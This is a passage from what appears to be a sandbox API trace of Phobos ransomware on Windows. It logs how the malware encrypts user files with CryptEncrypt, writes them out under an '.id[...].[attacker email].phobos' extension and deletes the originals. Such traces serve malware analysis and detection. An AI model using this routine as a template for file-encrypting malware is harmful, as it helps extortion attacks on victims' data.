menu\\programs\\maintenance\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b4 [0113.211] GetFileSizeEx (in: hFile=0x2b4, lpFileSize=0x3f8f888 | out: lpFileSize=0x3f8f888*=606) returned 1 [0113.211] CloseHandle (hObject=0x2b4) returned 1 [0113.211] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Desktop.ini" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\maintenance\\desktop.ini")) returned 0x26 [0113.211] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\maintenance\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0113.211] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Desktop.ini" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\maintenance\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0113.211] ResetEvent (hEvent=0x278) returned 1 [0113.211] SetEvent (hEvent=0x27c) returned 1 [0113.211] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3f8f8e8 | out: pbBuffer=0x3f8f8e8) returned 1 [0113.211] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\desktop.ini" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b4 [0113.211] GetFileSizeEx (in: hFile=0x2b4, lpFileSize=0x3f8f888 | out: lpFileSize=0x3f8f888*=174) returned 1 [0113.211] CloseHandle (hObject=0x2b4) returned 1 [0113.211] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\desktop.ini" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\desktop.ini")) returned 0x26 [0113.211] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0113.211] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\desktop.ini" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0113.212] WaitForSingleObject (hHandle=0x278, dwMilliseconds=0xffffffff) returned 0x0 [0113.262] ResetEvent (hEvent=0x278) returned 1 [0113.262] SetEvent (hEvent=0x27c) returned 1 [0113.262] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3f8f8e8 | out: pbBuffer=0x3f8f8e8) returned 1 [0113.262] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan\\WelcomeScan.jpg" (normalized: "c:\\programdata\\microsoft\\windows nt\\msscan\\welcomescan.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0113.262] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x3f8f888 | out: lpFileSize=0x3f8f888*=516424) returned 1 [0113.262] CloseHandle (hObject=0x314) returned 1 [0113.263] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan\\WelcomeScan.jpg" (normalized: "c:\\programdata\\microsoft\\windows nt\\msscan\\welcomescan.jpg")) returned 0x20 [0113.263] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan\\WelcomeScan.jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows nt\\msscan\\welcomescan.jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0113.263] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan\\WelcomeScan.jpg" (normalized: "c:\\programdata\\microsoft\\windows nt\\msscan\\welcomescan.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0113.263] WaitForSingleObject (hHandle=0x278, dwMilliseconds=0xffffffff) returned 0x0 [0113.267] ResetEvent (hEvent=0x278) returned 1 [0113.267] SetEvent (hEvent=0x27c) returned 1 [0113.267] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3f8f8e8 | out: pbBuffer=0x3f8f8e8) returned 1 [0113.267] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Mozilla\\logs\\maintenanceservice-install.log" (normalized: "c:\\programdata\\mozilla\\logs\\maintenanceservice-install.log"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b4 [0113.268] GetFileSizeEx (in: hFile=0x2b4, lpFileSize=0x3f8f888 | out: lpFileSize=0x3f8f888*=164) returned 1 [0113.268] CloseHandle (hObject=0x2b4) returned 1 [0113.268] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Mozilla\\logs\\maintenanceservice-install.log" (normalized: "c:\\programdata\\mozilla\\logs\\maintenanceservice-install.log")) returned 0x2020 [0113.268] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Mozilla\\logs\\maintenanceservice-install.log.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\mozilla\\logs\\maintenanceservice-install.log.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0113.268] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Mozilla\\logs\\maintenanceservice-install.log" (normalized: "c:\\programdata\\mozilla\\logs\\maintenanceservice-install.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0113.268] WaitForSingleObject (hHandle=0x278, dwMilliseconds=0xffffffff) returned 0x0 [0122.425] WaitForSingleObject (hHandle=0x278, dwMilliseconds=0xffffffff) returned 0x0 [0122.539] ResetEvent (hEvent=0x278) returned 1 [0122.539] SetEvent (hEvent=0x27c) returned 1 [0122.539] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3f8f8e8 | out: pbBuffer=0x3f8f8e8) returned 1 [0122.539] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\UserCache.bin" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\usercache.bin"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0122.540] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x3f8f888 | out: lpFileSize=0x3f8f888*=77477) returned 1 [0122.540] CloseHandle (hObject=0x334) returned 1 [0122.540] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\UserCache.bin" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\usercache.bin")) returned 0x2020 [0122.540] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\UserCache.bin.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\usercache.bin.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.540] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\UserCache.bin" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\usercache.bin"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0122.540] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3f8f828 | out: lpNewFilePointer=0x0) returned 1 [0122.540] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3f8f828 | out: lpNewFilePointer=0x0) returned 1 [0122.540] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\UserCache.bin.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\usercache.bin.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0122.541] CryptImportKey (in: hProv=0x254d70, pbData=0x3f8f7e0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x3f8f83c | out: phKey=0x3f8f83c*=0x29c420) returned 1 [0122.541] CryptSetKeyParam (hKey=0x29c420, dwParam=0x1, pbData=0x3f8f8e8, dwFlags=0x0) returned 1 [0122.541] ReadFile (in: hFile=0x334, lpBuffer=0x44f0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x3f8f864, lpOverlapped=0x0 | out: lpBuffer=0x44f0020*, lpNumberOfBytesRead=0x3f8f864*=0x12ea5, lpOverlapped=0x0) returned 1 [0122.550] CryptEncrypt (in: hKey=0x29c420, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x44f0020*, pdwDataLen=0x3f8f800*=0x12eb0, dwBufLen=0x12eb0 | out: pbData=0x44f0020*, pdwDataLen=0x3f8f800*=0x12eb0) returned 1 [0122.551] WriteFile (in: hFile=0x338, lpBuffer=0x44f0020*, nNumberOfBytesToWrite=0x12eb0, lpNumberOfBytesWritten=0x3f8f848, lpOverlapped=0x0 | out: lpBuffer=0x44f0020*, lpNumberOfBytesWritten=0x3f8f848*=0x12eb0, lpOverlapped=0x0) returned 1 [0122.553] CryptImportKey (in: hProv=0x254d70, pbData=0x3f8f7d4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x3f8f840 | out: phKey=0x3f8f840*=0x29c460) returned 1 [0122.553] CryptSetKeyParam (hKey=0x29c460, dwParam=0x1, pbData=0x3f8f8e8, dwFlags=0x0) returned 1 [0122.553] CryptEncrypt (in: hKey=0x29c460, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x44f0020*, pdwDataLen=0x3f8f800*=0x40, dwBufLen=0x40 | out: pbData=0x44f0020*, pdwDataLen=0x3f8f800*=0x40) returned 1 [0122.553] CryptDestroyKey (hKey=0x29c460) returned 1 [0122.553] WriteFile (in: hFile=0x338, lpBuffer=0x44f0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x3f8f848, lpOverlapped=0x0 | out: lpBuffer=0x44f0020*, lpNumberOfBytesWritten=0x3f8f848*=0xf2, lpOverlapped=0x0) returned 1 [0122.553] CryptDestroyKey (hKey=0x29c420) returned 1 [0122.553] CloseHandle (hObject=0x334) returned 1 [0122.553] CloseHandle (hObject=0x338) returned 1 [0122.554] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\UserCache.bin" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\usercache.bin")) returned 1 [0122.555] WaitForSingleObject (hHandle=0x278, dwMilliseconds=0xffffffff) returned 0x0 [0122.742] ResetEvent (hEvent=0x278) returned 1 [0122.742] SetEvent (hEvent=0x27c) returned 1 [0122.742] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3f8f8e8 | out: pbBuffer=0x3f8f8e8) returned 1 [0122.742] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\gdipfontcachev1.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b8 [0122.743] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x3f8f888 | out: lpFileSize=0x3f8f888*=108824) returned 1 [0122.743] CloseHandle (hObject=0x2b8) returned 1 [0122.743] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\gdipfontcachev1.dat")) returned 0x2020 [0122.743] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\gdipfontcachev1.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.743] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\gdipfontcachev1.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b8 [0122.743] SetFilePointerEx (in: hFile=0x2b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3f8f828 | out: lpNewFilePointer=0x0) returned 1 [0122.743] SetFilePointerEx (in: hFile=0x2b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3f8f828 | out: lpNewFilePointer=0x0) returned 1 [0122.743] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\gdipfontcachev1.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0122.744] CryptImportKey (in: hProv=0x254d70, pbData=0x3f8f7e0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x3f8f83c | out: phKey=0x3f8f83c*=0x29c1e0) returned 1 [0122.744] CryptSetKeyParam (hKey=0x29c1e0, dwParam=0x1, pbData=0x3f8f8e8, dwFlags=0x0) returned 1 [0122.744] ReadFile (in: hFile=0x2b8, lpBuffer=0x44f0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x3f8f864, lpOverlapped=0x0 | out: lpBuffer=0x44f0020*, lpNumberOfBytesRead=0x3f8f864*=0x1a918, lpOverlapped=0x0) returned 1 [0122.908] CryptEncrypt (in: hKey=0x29c1e0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x44f0020*, pdwDataLen=0x3f8f800*=0x1a920, dwBufLen=0x1a920 | out: pbData=0x44f0020*, pdwDataLen=0x3f8f800*=0x1a920) returned 1 [0122.909] WriteFile (in: hFile=0x314, lpBuffer=0x44f0020*, nNumberOfBytesToWrite=0x1a920, lpNumberOfBytesWritten=0x3f8f848, lpOverlapped=0x0 | out: lpBuffer=0x44f0020*, lpNumberOfBytesWritten=0x3f8f848*=0x1a920, lpOverlapped=0x0) returned 1 [0122.912] CryptImportKey (in: hProv=0x254d70, pbData=0x3f8f7d4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x3f8f840 | out: phKey=0x3f8f840*=0x29c420) returned 1 [0122.912] CryptSetKeyParam (hKey=0x29c420, dwParam=0x1, pbData=0x3f8f8e8, dwFlags=0x0) returned 1 [0122.912] CryptEncrypt (in: hKey=0x29c420, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x44f0020*, pdwDataLen=0x3f8f800*=0x50, dwBufLen=0x50 | out: pbData=0x44f0020*, pdwDataLen=0x3f8f800*=0x50) returned 1 [0122.912] CryptDestroyKey (hKey=0x29c420) returned 1 [0122.912] WriteFile (in: hFile=0x314, lpBuffer=0x44f0020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x3f8f848, lpOverlapped=0x0 | out: lpBuffer=0x44f0020*, lpNumberOfBytesWritten=0x3f8f848*=0x102, lpOverlapped=0x0) returned 1 [0122.912] CryptDestroyKey (hKey=0x29c1e0) returned 1 [0122.912] CloseHandle (hObject=0x2b8) returned 1 [0122.912] CloseHandle (hObject=0x314) returned 1 [0122.914] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\gdipfontcachev1.dat")) returned 1 [0122.916] WaitForSingleObject (hHandle=0x278, dwMilliseconds=0xffffffff) returned 0x0 [0123.341] ResetEvent (hEvent=0x278) returned 1 [0123.341] SetEvent (hEvent=0x27c) returned 1 [0123.341] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3f8f8e8 | out: pbBuffer=0x3f8f8e8) returned 1 [0123.341] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\000003.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\000003.log"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0123.342] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x3f8f888 | out: lpFileSize=0x3f8f888*=0) returned 1 [0123.342] CloseHandle (hObject=0x334) returned 1 [0123.342] WaitForSingleObject (hHandle=0x278, dwMilliseconds=0xffffffff) returned 0x0 [0123.388] ResetEvent (hEvent=0x278) returned 1 [0123.388] SetEvent (hEvent=0x27c) returned 1 [0123.388] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3f8f8e8 | out: pbBuffer=0x3f8f8e8) returned 1 [0123.388] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\000003.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\000003.log"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0123.391] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x3f8f888 | out: lpFileSize=0x3f8f888*=342) returned 1 [0123.391] CloseHandle (hObject=0x334) returned 1 [0123.391] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\000003.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\000003.log")) returned 0x2020 [0123.391] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\000003.log.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\000003.log.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0123.391] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\000003.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\000003.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0123.391] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3f8f828 | out: lpNewFilePointer=0x0) returned 1 [0123.391] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3f8f828 | out: lpNewFilePointer=0x0) returned 1 [0123.391] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\000003.log.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\000003.log.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0123.392] CryptImportKey (in: hProv=0x254d70, pbData=0x3f8f7e0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x3f8f83c | out: phKey=0x3f8f83c*=0x29c4a0) returned 1 [0123.392] CryptSetKeyParam (hKey=0x29c4a0, dwParam=0x1, pbData=0x3f8f8e8, dwFlags=0x0) returned 1 [0123.392] ReadFile (in: hFile=0x334, lpBuffer=0x44f0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x3f8f864, lpOverlapped=0x0 | out: lpBuffer=0x44f0020*, lpNumberOfBytesRead=0x3f8f864*=0x156, lpOverlapped=0x0) returned 1 [0123.394] CryptEncrypt (in: hKey=0x29c4a0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x44f0020*, pdwDataLen=0x3f8f800*=0x160, dwBufLen=0x160 | out: pbData=0x44f0020*, pdwDataLen=0x3f8f800*=0x160) returned 1 [0123.394] WriteFile (in: hFile=0x344, lpBuffer=0x44f0020*, nNumberOfBytesToWrite=0x160, lpNumberOfBytesWritten=0x3f8f848, lpOverlapped=0x0 | out: lpBuffer=0x44f0020*, lpNumberOfBytesWritten=0x3f8f848*=0x160, lpOverlapped=0x0) returned 1 [0123.395] CryptImportKey (in: hProv=0x254d70, pbData=0x3f8f7d4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x3f8f840 | out: phKey=0x3f8f840*=0x29c4e0) returned 1 [0123.395] CryptSetKeyParam (hKey=0x29c4e0, dwParam=0x1, pbData=0x3f8f8e8, dwFlags=0x0) returned 1 [0123.395] CryptEncrypt (in: hKey=0x29c4e0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x44f0020*, pdwDataLen=0x3f8f800*=0x40, dwBufLen=0x40 | out: pbData=0x44f0020*, pdwDataLen=0x3f8f800*=0x40) returned 1 [0123.395] CryptDestroyKey (hKey=0x29c4e0) returned 1 [0123.395] WriteFile (in: hFile=0x344, lpBuffer=0x44f0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x3f8f848, lpOverlapped=0x0 | out: lpBuffer=0x44f0020*, lpNumberOfBytesWritten=0x3f8f848*=0xf2, lpOverlapped=0x0) returned 1 [0123.395] CryptDestroyKey (hKey=0x29c4a0) returned 1 [0123.395] CloseHandle (hObject=0x334) returned 1 [0123.396] CloseHandle (hObject=0x344) returned 1 [0123.400] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\000003.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\000003.log")) returned 1 [0123.401] WaitForSingleObject (hHandle=0x278, dwMilliseconds=0xffffffff) returned 0x0 [0123.460] ResetEvent (hEvent=0x278) returned 1 [0123.460] SetEvent (hEvent=0x27c) returned 1 [0123.460] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3f8f8e8 | out: pbBuffer=0x3f8f8e8) returned 1 [0123.460] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\000003.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\000003.log"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0123.461] GetFileSizeEx (in: hFile=0x344, lpFileSize=0x3f8f888 | out: lpFileSize=0x3f8f888*=1197) returned 1 [0123.461] CloseHandle (hObject=0x344) returned 1 [0123.461] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\000003.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\000003.log")) returned 0x2020 [0123.461] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\000003.log.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\000003.log.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0123.461] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\000003.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\000003.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0123.462] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3f8f828 | out: lpNewFilePointer=0x0) returned 1 [0123.462] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3f8f828 | out: lpNewFilePointer=0x0) returned 1 [0123.462] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\000003.log.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\000003.log.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0123.463] CryptImportKey (in: hProv=0x254d70, pbData=0x3f8f7e0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x3f8f83c | out: phKey=0x3f8f83c*=0x29c4e0) returned 1 [0123.463] 